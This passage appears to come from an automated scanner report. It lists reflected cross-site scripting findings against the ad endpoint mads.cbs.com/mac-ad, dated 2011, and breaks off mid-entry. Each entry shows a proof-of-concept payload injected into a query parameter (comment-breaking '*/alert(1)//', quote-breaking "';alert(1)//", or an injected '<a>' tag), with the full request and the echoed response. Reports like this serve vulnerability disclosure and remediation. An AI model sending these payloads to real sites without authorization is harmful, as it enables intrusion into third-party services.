Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1; __utmz=235293011.1303946085.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235293011.1320039961.1303946085.1303946085.1303946085.1; __utmc=235293011; __utmb=235293011.1.10.1303946085

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:16:55 GMT
Server: Apache/2.2
Content-Length: 606
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:16:55 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US3ff35*/alert(1)//aa0b56aa88c&x-cb=49351159&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) */;window.CBSI_PAGESTATE='1|3462;BC3462-
...[SNIP]...

3.518. http://mads.cbs.com/mac-ad [DVAR_SESSION parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the DVAR_SESSION request parameter is copied into a JavaScript inline comment. The payload 831d5*/alert(1)//254f3d18e93 was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a831d5*/alert(1)//254f3d18e93&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=49351159&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1; __utmz=235293011.1303946085.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235293011.1320039961.1303946085.1303946085.1303946085.1; __utmc=235293011; __utmb=235293011.1.10.1303946085

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:16:43 GMT
Server: Apache/2.2
Content-Length: 606
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:16:43 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a831d5*/alert(1)//254f3d18e93&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=49351159&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CI
...[SNIP]...

3.519. http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload 91d8a<a>deda46da6fb was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS91d8a<a>deda46da6fb&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=49351159&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1; __utmz=235293011.1303946085.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235293011.1320039961.1303946085.1303946085.1303946085.1; __utmc=235293011; __utmb=235293011.1.10.1303946085

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:15:45 GMT
Server: Apache/2.2
Content-Length: 543
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:15:45 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS91d8a<a>deda46da6fb&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=49351159&ADREQ&beacon=1&cooki
...[SNIP]...

3.520. http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into a JavaScript inline comment. The payload 8a06d*/alert(1)//749d065394e was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS8a06d*/alert(1)//749d065394e&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=68175691&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:15:35 GMT
Server: Apache/2.2
Content-Length: 1104
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:15:35 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS8a06d*/alert(1)//749d065394e&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=68175691&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.writ
...[SNIP]...

3.521. http://mads.cbs.com/mac-ad [NCAT parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the NCAT request parameter is copied into the HTML document as plain text between tags. The payload 65b7f<a>d977ae7e400 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=65b7f<a>d977ae7e400&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=30406054&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1; __utmz=235293011.1303946085.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235293011.1320039961.1303946085.1303946085.1303946085.1; __utmc=235293011; __utmb=235293011.1.10.1303946085

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:17:42 GMT
Server: Apache/2.2
Content-Length: 581
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:17:42 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=65b7f<a>d977ae7e400&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=30406054&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='10'
...[SNIP]...

3.522. http://mads.cbs.com/mac-ad [NCAT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the NCAT request parameter is copied into a JavaScript inline comment. The payload 2b87c*/alert(1)//8246963639f was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A2b87c*/alert(1)//8246963639f&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=49351159&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1; __utmz=235293011.1303946085.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235293011.1320039961.1303946085.1303946085.1303946085.1; __utmc=235293011; __utmb=235293011.1.10.1303946085

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:16:48 GMT
Server: Apache/2.2
Content-Length: 633
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:16:48 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A2b87c*/alert(1)//8246963639f&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=49351159&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:2b87c*:alert1::8246963639f
...[SNIP]...

3.523. http://mads.cbs.com/mac-ad [NODE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the NODE request parameter is copied into a JavaScript inline comment. The payload 7ac89*/alert(1)//fca221b2f80 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=17ac89*/alert(1)//fca221b2f80&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=49351159&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1; __utmz=235293011.1303946085.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235293011.1320039961.1303946085.1303946085.1303946085.1; __utmc=235293011; __utmb=235293011.1.10.1303946085

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:16:50 GMT
Server: Apache/2.2
Content-Length: 607
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:16:50 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=17ac89*/alert(1)//fca221b2f80&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=49351159&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) */;windo
...[SNIP]...

3.524. http://mads.cbs.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload 8d4e5*/alert(1)//9372bc8408b was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=8d4e5*/alert(1)//9372bc8408b&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=68175691&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:16:01 GMT
Server: Apache/2.2
Content-Length: 1158
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:16:01 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=8d4e5*/alert(1)//9372bc8408b&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=68175691&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad
...[SNIP]...

3.525. http://mads.cbs.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1cff'%3balert(1)//8c03b27fe6b was submitted in the PAGESTATE parameter. This input was echoed as b1cff';alert(1)//8c03b27fe6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=b1cff'%3balert(1)//8c03b27fe6b&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=68175691&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:15:59 GMT
Server: Apache/2.2
Content-Length: 1161
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:15:59 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=b1cff'%3balert(1)//8c03b27fe6b&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVA
...[SNIP]...
sion%253da&ucat_rsi=%2526&pg=&t=2011.04.27.23.15.59/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" style="position:absolute; top:0px; left:0px" width="0" />');
;window.CBSI_PAGESTATE='b1cff';alert(1)//8c03b27fe6b';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw19.cnet.com::1700518208 2011.04.27.23.15.59 *//* MAC T 0.0.3.4 */

3.526. http://mads.cbs.com/mac-ad [POS parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the POS request parameter is copied into the HTML document as plain text between tags. The payload ca2e0<a>d36ab19afb3 was submitted in the POS parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=68175691&ADREQ&SP=80&POS=100ca2e0<a>d36ab19afb3&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:18:14 GMT
Server: Apache/2.2
Content-Length: 584
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:18:14 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=68175691&ADREQ&SP=80&POS=100ca2e0<a>d36ab19afb3&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='80' CNET-PTYPE='10' POS='100ca2e0ad36ab19afb3' NCAT='1:' CNET-PARTNER-ID='1' DVAR_PSID='' ) TO
...[SNIP]...

3.527. http://mads.cbs.com/mac-ad [PTYPE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the PTYPE request parameter is copied into the HTML document as plain text between tags. The payload 10c8b<a>99aaba266e7 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=200010c8b<a>99aaba266e7&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=30406054&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1; __utmz=235293011.1303946085.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235293011.1320039961.1303946085.1303946085.1303946085.1; __utmc=235293011; __utmb=235293011.1.10.1303946085

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:16:35 GMT
Server: Apache/2.2
Content-Length: 568
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:16:35 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=200010c8b<a>99aaba266e7&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=30406054&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' B
...[SNIP]...

3.528. http://mads.cbs.com/mac-ad [PTYPE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the PTYPE request parameter is copied into a JavaScript inline comment. The payload e46aa*/alert(1)//55e43748936 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000e46aa*/alert(1)//55e43748936&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=68175691&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:16:35 GMT
Server: Apache/2.2
Content-Length: 1129
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:16:35 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000e46aa*/alert(1)//55e43748936&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=68175691&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

3.529. http://mads.cbs.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into a JavaScript inline comment. The payload 16061*/alert(1)//bd621be8d5e was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=16416061*/alert(1)//bd621be8d5e&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=49351159&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1; __utmz=235293011.1303946085.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235293011.1320039961.1303946085.1303946085.1303946085.1; __utmc=235293011; __utmb=235293011.1.10.1303946085

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:16:36 GMT
Server: Apache/2.2
Content-Length: 618
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:16:36 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=16416061*/alert(1)//bd621be8d5e&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=49351159&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (S
...[SNIP]...

3.530. http://mads.cbs.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

